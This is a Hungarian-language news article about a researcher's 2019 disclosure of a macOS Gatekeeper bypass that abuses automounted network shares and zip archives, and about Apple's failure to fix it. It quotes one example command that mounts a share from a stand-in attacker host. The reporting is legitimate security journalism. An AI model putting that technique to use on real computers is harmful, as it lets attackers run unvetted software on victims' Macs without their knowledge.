Könnyű rosszindulatú alkalmazást telepíteni Mac számítógépre. Az Apple három hónap után sem javította ki a hibát

27. 5. 2019

Filippo Cavallarin biztonsági kutató figyelmeztetést tett közzé blogjában a macOS 10.14.5 hibájával kapcsolatban. Ez magában foglalja a Gatekeeper biztonsági intézkedéseinek teljes megkerülésének lehetőségét. Cavallarin szerint már idén februárban felhívta a figyelmet a hibára az Apple-re, de a cég a legújabb frissítésben nem javította ki.

A Gatekeepert az Apple fejlesztette ki, és 2012-ben építette be először az asztali operációs rendszerébe. Ez egy olyan mechanizmus, amely megakadályozza, hogy egy alkalmazás a felhasználó tudta és beleegyezése nélkül fusson. Miután letöltött egy alkalmazást, a Gatekeeper automatikusan ellenőrzi annak kódját, hogy ellenőrizze, megfelelően aláírta-e a szoftvert az Apple.

Cavallarin blogbejegyzésében kijelenti, hogy a Gatekeeper alapértelmezés szerint mind a külső tárhelyet, mind a hálózati megosztásokat biztonságos helynek tekinti. Ezért minden alkalmazás, amely ezekben a célokban található, automatikusan elindítható anélkül, hogy át kellene mennie a Gatekeeper ellenőrzésen. Ezt a funkciót lehet kihasználni rosszindulatú szoftverek elindítására a felhasználó tudta nélkül.

Az egyik szempont, amely lehetővé teszi a jogosulatlan hozzáférést, az automatikus csatlakoztatás funkció, amely lehetővé teszi a felhasználók számára, hogy automatikusan csatoljanak egy hálózati megosztást egyszerűen a „/net/” karakterlánccal kezdődő elérési út megadásával. Példaként Cavallarin az „ls /net/evil-attacker.com/sharedfolder/” elérési utat említi, amely miatt az operációs rendszer betöltheti egy „sharefolder” mappa tartalmát egy távoli helyen, amely potenciálisan rosszindulatú lehet.

A videóban megnézheti a fenyegetés működését:

Egy másik tényező az a tény, hogy ha megosztanak egy zip-archívumot, amely egy, az automatikus csatolás funkcióhoz vezető hivatkozást tartalmaz, akkor azt a Gatekeeper nem fogja ellenőrizni. Így az áldozat könnyedén letöltheti és kibonthatja a rosszindulatú archívumot, így a támadó gyakorlatilag bármilyen szoftvert futtathat a Mac-en a felhasználó tudta nélkül. A Finderben, amely alapértelmezés szerint elrejti bizonyos bővítményeket, szintén megvan a maga része ebből a sérülékenységből.

Cavallarin a blogjában azt állítja, hogy az Apple idén február 22-én hívta fel a figyelmet a macOS operációs rendszer sebezhetőségére. De május közepén az Apple abbahagyta a kommunikációt Cavallarinnal, ezért Cavallarin úgy döntött, hogy nyilvánosságra hozza az egészet.

Forrás: FCVL

Témák: tárolás, automatikus, MacOS, videó, Beállítások, funkció, felhasználó, aplikace, Apple

A cikk megvitatása

Az Ön neve

A te hozzászólásod

A fenti adatok kitöltésével tudomásul veszem, hogy a brünni tartományi bíróságon bejegyzett TEXT FACTORY s.r.o., székhelye Brno, Durďákova 336/29, Černá Pole, irányítószám: 613 00, azonosítószám: 06157831 , írja be a 100399-et, az általam kitöltött regisztrációs űrlapon megadott személyes adataimat a TEXT FACTORY s.r.o. jogos érdekei alapján kezeli a 6. cikk (1) bekezdésének megfelelően f) GDPR és jogi kötelezettségek teljesítése (GDPR 6. cikk (1) bekezdés c) pont), az alábbi célokra: a TEXT FACTORY s.r.o. által üzemeltetett webhelyek látogatóinak felhatalmazásának biztosítására, hogy aktívan hozzájárulhassanak a publikált cikkekhez vagy viták során. fórumokat, és a TEXT FACTORY s.r.o. mint e vitafórumok adminisztrátora jogait gyakorolja. A személyes adatok kezelésével és a jogokkal kapcsolatos további információk a címen találhatók Leckék a személyes adatok védelméről. a teljes szöveget

Lehet, hogy érdekel téged

Összefüggő